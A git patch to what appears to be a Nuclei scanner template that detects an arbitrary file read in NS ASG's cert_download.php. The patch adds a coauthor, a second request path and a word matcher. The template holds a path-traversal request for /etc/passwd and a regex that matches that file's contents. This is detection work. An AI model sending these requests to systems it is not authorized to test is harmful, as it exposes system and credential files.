From 37dc09b55b2603b774faebbf02790fcf8cd386e8 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 7 Apr 2022 14:14:15 +0530
Subject: [PATCH] Update ns-asg-file-read.yaml

---
 vulnerabilities/other/ns-asg-file-read.yaml | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/vulnerabilities/other/ns-asg-file-read.yaml b/vulnerabilities/other/ns-asg-file-read.yaml
index de44217948..aac9e65976 100644
--- a/vulnerabilities/other/ns-asg-file-read.yaml
+++ b/vulnerabilities/other/ns-asg-file-read.yaml
@@ -2,7 +2,7 @@ id: nsasg-arbitrary-file-read
 
 info:
   name: NS ASG Arbitrary File Read
-  author: pikpikcu
+  author: pikpikcu, ritikchaddha
   severity: high
   reference: https://zhuanlan.zhihu.com/p/368054963
   tags: nsasg,lfi
@@ -11,6 +11,7 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd"
+      - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php"
 
     matchers-condition: and
     matchers:
@@ -18,6 +19,12 @@ requests:
       - type: regex
         regex:
           - "root:.*:0:0:"
+         
+      - type: word
+        part: body
+        words:
+          - "$certfile"
+          - "application/pdf"
 
       - type: status
         status: